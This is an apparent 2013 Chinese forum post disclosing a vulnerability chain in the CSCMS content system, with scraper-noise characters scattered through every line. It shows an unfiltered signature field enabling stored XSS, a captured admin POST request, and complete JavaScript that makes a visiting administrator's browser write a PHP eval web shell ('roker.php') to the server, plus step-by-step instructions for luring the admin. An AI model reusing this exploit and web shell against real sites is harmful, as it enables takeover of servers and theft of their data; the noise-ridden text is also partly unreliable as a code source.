|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
0 T8 R8 m+ ]6 r3 }& E' ? m官网已经修补了,所以重新下了源码8 [- q: F" a4 Y4 [; M! t, r
因为 后台登入 还需要认证码 所以 注入就没看了。* J, p" e* J. r- h* J. a$ ]
存在 xss
( S0 K) m8 L# P( w" C( k漏洞文件 user/member/skin_edit.php
% z; Y. o+ k: f& X* U本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:1 j" y% i, r; H, v* m0 E
, U& x; x" N- F# h/ c0 O: L</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
& K. }3 g: C" U7 Z+ b1 L
% Z' ~2 ]9 ~. [( T# ~9 t5 w</textarea></td></tr>
Q/ K6 l9 L% D5 R2 M! V
, c, A6 [- @* L: R% t+ N* V user/do.php
! c4 J* Z: t$ a4 h# M, W9 \& R3 B' ^5 j& E, E* x
: ~. z- ?3 R Z# ]! x
if($op=='zl'){ //资料+ R% z+ D3 z8 h/ F! n7 O
& X4 F1 C/ D$ _
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
5 J- N6 d7 K! W) p4 ] exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));' L9 G o- S+ G: t
) W) ?% A! t% j5 s
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',+ z4 w9 c2 L0 I5 g4 r' k8 x
7 G4 P" X+ G2 D1 x' z CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."', w. c r, I: p4 c0 J+ k6 g1 K
where CS_Name='".$cscms_name."'";' a$ L* [9 M: O' G/ g
+ g @$ o3 ]6 k h& G
if($db->query($sql)){
; f' L. r1 q3 `1 ?, p2 O9 l
% s3 E5 V! ^& b+ ~, A! w exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));; N* b" t# [' D1 _- R
* Y( j* b$ K% b7 Y3 C3 c% ?
}else{
% t0 V1 B ~7 @! j) V( o) M ! E. v. M$ K) I. S
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));0 A8 n0 X+ S; l; c \- [- M4 j4 j/ t
* Q* O% P( b: g0 a }
, ?) @( h% e; x+ _9 s& x' K# V. S. U9 ?6 r( `
0 I3 X8 X/ s: p6 S0 y5 q$ J' @) ]
没有 过滤导致xss产生。+ w" f' R" s' O' X8 F1 y
后台 看了下 很奇葩的是可以写任意格式文件。。
& ?" b+ | d) b( f& G' _抓包。。 C1 a5 \, c7 S% R
4 Z4 f7 d! ]& l/ |# ^4 _& Q# d! K- g" t' z( z8 z
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1, N( J# T' d7 Q0 V/ h K
6 I% r0 Z/ A- n" p% q* |/ ? SAccept: text/html, application/xhtml+xml, */*! D$ [8 c) O6 q+ U( G
% ^8 [( Q# [4 f' y" |4 N X
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php4 s$ o! n# E6 ?. R" z/ b7 w1 e) T
6 \/ [0 X% K4 o D- {: a5 iAccept-Language: zh-CN
" b" z+ ?: m7 M: d2 \4 w4 |% S; u
( y: Z3 ?4 q* d; t @7 H" W4 l# tUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
! O* u9 t7 ~7 t7 Q: ]1 @; h * Z4 C* G. a$ x, T9 t8 W9 h2 C
Content-Type: application/x-www-form-urlencoded
; Z0 C# {! M1 u+ P: x( S2 k
9 z3 j4 j! ^ x, j# k5 zAccept-Encoding: gzip, deflate
! g. s6 v/ M+ m5 ^ " d) t9 ~5 S( K3 F
Host: 127.0.0.1& Q9 p, Z, _( j. H' H! _6 t$ n
+ ]- t4 S" Z6 Q+ G
Content-Length: 386 _% c9 Y, y# J
2 N! w8 E5 b. U" }6 Q
DNT: 1
; U- |5 V. o5 T. b0 ] " `, ~9 k6 p/ w+ {2 W4 f. e3 s
Connection: Keep-Alive/ H2 E \/ _9 b* V6 i
" t+ n+ `% @9 ^$ {, m, A
Cache-Control: no-cache% i" K0 t2 k! u# j; W3 k- I& v( U& ]
* S" G) f* p" g
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
$ _) J/ ?5 Y1 p! V% ]5 ~ 8 D' w& K1 E: s! h- S6 y( ~
/ E7 X' Q, G" Nname=aaa.php&content=%3Cs%3E%3Ca%25%3E4 q$ q3 n D: c, d
6 f w9 d, [" R1 V" }
7 G; D/ \* V1 m0 b" N g2 Z8 T5 R. @5 T: p: v. \: x
于是 构造js如下。
5 M9 ]# x# Q. @0 Y' P" l0 B! J2 q
本帖隐藏的内容<script>
1 w4 _- E3 r% R, u) w( hthisTHost = top.location.hostname;
9 L9 T6 K* w: s 3 q* H# t7 u& ~8 _- n
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
+ N4 a0 P# O! Q$ y4 e & Y& ?8 b! _$ s( H* ^2 p
function PostSubmit(url, data, msg) {
' J x9 i% F8 ~+ H6 J var postUrl = url;
% h% B$ f; _) b1 `% u7 Y
( n/ k' t) } R' B t& J5 v1 A var postData = data;
0 o. K3 s+ ^: x var msgData = msg; . w% c1 {% Z2 g# |5 t
var ExportForm = document.createElement("FORM"); 2 \; j6 N- r9 l5 h- T
document.body.appendChild(ExportForm); # _* |0 e2 F5 w! Y) K
ExportForm.method = "POST";
, B; m$ S' W4 C. {( c var newElement = document.createElement("input");
* m! x* P) f6 T' H1 s0 G$ L newElement.setAttribute("name", "name"); - I$ @9 U: M3 I% M8 X1 N T
newElement.setAttribute("type", "hidden");
7 `3 Z |. Y9 C8 M; d. W1 g var newElement2 = document.createElement("input");
0 L* {# x$ t. o newElement2.setAttribute("name", "content");
3 C6 [* t4 K y; {' ] newElement2.setAttribute("type", "hidden");
9 ^; d6 e; Q( S3 S6 | ExportForm.appendChild(newElement); 4 o3 B1 d7 e7 \" B+ H( O
ExportForm.appendChild(newElement2);
& |2 ^/ ]# R1 R8 l; Z3 g1 p3 b { newElement.value = postData; " M! Q1 B" \/ X! Z. {3 @) X
newElement2.value = msgData;
2 {; F" E, s6 @ ExportForm.action = postUrl;
+ _) r6 i4 w, W4 U# w ExportForm.submit(); - B' |# }) M+ S7 g* I
};
4 k2 v; F: \, F* h6 \! `0 Q : b5 L# E% @6 A, o6 d Z3 {. u
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
! X4 }1 q& ?4 H4 D
$ U* H7 ^+ y8 a+ L. t; J</script>
9 n. G0 N. \! Z5 E+ p! b1 `0 w- @7 ^+ q! p U0 _5 r
3 |2 V+ n2 R/ {7 H
7 h9 M2 D" w3 ^- nhttp://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入. I7 ]- `5 Y# C1 r
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
2 L7 z2 Q* v0 Z* y7 _% L就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
" r/ G8 M9 w) w0 @3 D
|
|
发表于 2013-11-6 18:09:37
收藏
分享
支持
反对